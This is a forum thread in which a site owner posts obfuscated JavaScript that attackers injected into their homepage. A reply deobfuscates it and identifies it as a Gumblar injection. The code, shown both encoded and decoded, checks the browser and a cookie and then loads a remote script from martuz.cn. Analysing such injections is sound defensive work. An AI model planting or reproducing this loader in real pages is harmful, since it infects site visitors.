Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

What does this java script do?


  • Please log in to reply
1 reply to this topic

#1 PSSMike

PSSMike

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:27 PM

Posted 19 May 2009 - 09:55 PM

My web site was hacked into and this script was added to my Index.html file in the HEAD section.

My hosting provders tech support tell me it is some sore of Badware???? They sent me to this site http://www.stopbadware.org/home/security

I have the offending code removed.

Can any one tell me what this code does?


script language=javascript><!--
(function(){var YkjaF='%';var nxcZ='var<20a<3d<22<53cr<69<70tE<6e<67in<65<22<2cb<3d<22Ver<73<69on()<2b<22<2cj<3d<22<22<2cu<3dna<76<69ga<74<6f<72<2eus<65rA<67en<74<3bif(<28u<2e<69ndexOf(<22<43hr<6fm<65<22)<3c0)<26<26(u<2ein<64ex<4ff(<22Win<22)<3e0)<26<26(u<2ei<6e<64e<78Of(<22<4eT<206<22)<3c<30)<26<26<28d<6f<63um<65n<74<2eco<6f<6bie<2eindexOf(<22miek<3d<31<22)<3c0)<26<26(typ<65<6ff(<7ar<76z<74s)<21<3dtype<6ff(<22A<22<29))<7bzr<76zts<3d<22<41<22<3b<65va<6c(<22if(windo<77<2e<22+a+<22)j<3d<6a+<22+<61+<22Maj<6fr<22+b+a+<22M<69n<6fr<22+b+a+<22Bu<69ld<22+b+<22j<3b<22)<3bd<6fcum<65nt<2ew<72it<65(<22<3cscri<70t<20sr<63<3d<2f<2fmart<75<22+<22<7a<2ecn<2f<76id<2f<3fid<3d<22<2b<6a+<22<3e<3c<5c<2f<73c<72<69pt<3e<22)<3b<7d';var Rrf3=nxcZ.replace(/</g,YkjaF);eval(unescape(Rrf3))})();
--></script


Thanks

BC AdBot (Login to Remove)

 


#2 Minh Triet Pham Tran

Minh Triet Pham Tran

  • Members
  • 110 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:27 PM

Posted 07 January 2012 - 04:13 PM

Here is the deobfuscated JavaScript code:
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
 if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
 {
   zrvzts="A";
   eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
 document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}

This is a gumblar injection attack, you could read further information in the following links:
Martuz .cn – New Incarnation of the Gumblar Exploit. So What’s New? | Unmask Parasites. Blog.
http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/

トレンドマイクロ:セキュリティデータベース(Threat Encyclopedia)
http://about-threats.trendmicro.com/ArchiveMalware.aspx?language=jp&name=JS_GUMBLAR.ERK

AhnLab - 网络安全综合解决方案提供商|您身边的网络安全专家
http://www.ahn.com.cn/global/pressroom_view.ESD?fmethod=view&press_seq=1403&printNum=2

martuz.cn -(95.129.145.58)
http://www.malwaredomainlist.com/forums/index.php?topic=2892.0
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology. — Bruce Schneier




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users